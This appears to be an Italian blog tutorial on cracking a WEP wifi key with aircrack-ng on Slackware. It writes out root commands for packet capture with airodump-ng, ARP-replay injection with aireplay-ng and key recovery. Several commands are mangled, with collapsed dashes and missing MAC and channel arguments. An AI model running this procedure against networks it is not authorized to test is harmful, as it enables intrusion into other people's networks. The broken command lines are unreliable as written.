Pistulune staminchiazza….capocchiova!

Leggendo un pò di post qua e la nella rete, mi sono imbattuto spesso in dissertazioni varie sul packet injection. Credo di aver letto qualcosa di sensato e qualcosa di meno sensato, e ho deciso di scrivere qualcosa anche io, tratto da un pò di esperienza sul campo… (:D ndr).

La distro usata è Slackware 12.1 e l’hardware è composto da DLink DWL-G700AP, ipw2200BG su notebook ASUS A6000(A6NE).

Anche se sul notebook è già tutto installato e configurato, ripetiamo cmq le operazioni per una miglior comprensione. Partiamo con lo scaricare i pacchetti necessari, premesso che il kernel 2.6.24.5-smp della Slackware 12.1 rende la ipw2200 funzionante al 100%, quindi le “eventuali patches” che troveremo su siti vari NON SONO NECESSARIE, incluse quelle attualmente pubblicate sul sito di riferimento della suite di Aircrack.

Scarichiamo e installiamo la suite:

root@black:~# wget http://u-clan.homeunix.org/aircrack-ng-1.0-rc1.tar.gz

root@black:~# tar -zxvf aircrack-ng-1.0-rc1.tar.gz

root@black:~# cd aicrack

root@black:~/aircrack-ng-1.0# make

root@black:~/aircrack-ng-1.0# make install

oppure il metodo più semplice rimane quello di usare il Slapt-get:

root@black:~# slapt-get –install aircrack-ng

(ricordo che davanti a “install” ci va il doppio segno meno “-”, che per qualche motivo wordpress elimina lasciandone uno solo.)

mode 2 –interactive

mode 3 –arpreplay

mode 4 –chopchop

In primisi cerchiamo info sull’AP utilizzando i classici comandi, quindi apriamo una shell e scriviamo:

root@black:~# iwlist scan

in modo da ottenere SSID e channel, abilitiamo l’interfaccia “rtap0″ modprobandola”:

root@black:~# rmmod ipw2200

root@black:~# modprobe ipw2200 rtap_iface=1

creiamo una connessione con l’AP, utilizzando una “fakekey”, a causa di una limitazione nel driver delle ipw2200, che per funzionare sotto aireplay-ng deve essere in “mode managed” e poi collegata all’AP.

root@black:~# iwconfig eth1 ap

root@black:~# iwconfig eth1 key s:fakekey

root@black:~# iwconfig eth1 mode managed

tiriamo su le interfacce:

root@black:~# ifconfig eth1 up

root@black:~# ifconfig rtap0 up

fatto questo possiamo tirare su airodump-ng e catturare i pacchetti in transito:

root@black:~# airodump-ng –channel –bessid -w file(nome del file .cap, solo il nome, all’estenzione ci penserà da solo) rtap0

nel nostro terminale possiamo quindi vedere se ci sono clients connessi all’AP, e facciamo caso anche ai MAC che compaiono, anche perchè bisognerà utilizzarne uno.

Apriamo un altro terminale e diamo quest’altro comando:

root@black:~# aireplay-ng –arpreplay -b -h -i rtap0 eth1 (questo comando serve a fare il vero e proprio packet injection, infatti dice all’interfaccia rtap0 di rimanere in ascolto e alla eth1 di inoculare codice…badare bene che la qualità del segnale sia alta).

Dopo aver atteso qualche minuto e aver raccolto un numero sufficiente di pacchetti possiamo passare all’uso vero e proprio di aircrack:

root@black:~# aircrack-ng -z -b file.cap(che è il file che contiene i dati necessari al crack, file creato in precedenza con l’uso di airodump).

Fatto questo, il risultato di aircrack dovrebbe essere la password.

Slackware Linux 12.1 kernel 2.6.24.5

L’AP è un DLink DWL-G700AP, la scheda di rete è una ipw2200BG su notebook ASUS A6000(a6ne)

Tutti i test effettuati sono per puro e semplice motivo didattico, effettuati sulla rete wifi di casa mia, per scoprirne le vulnerabilità.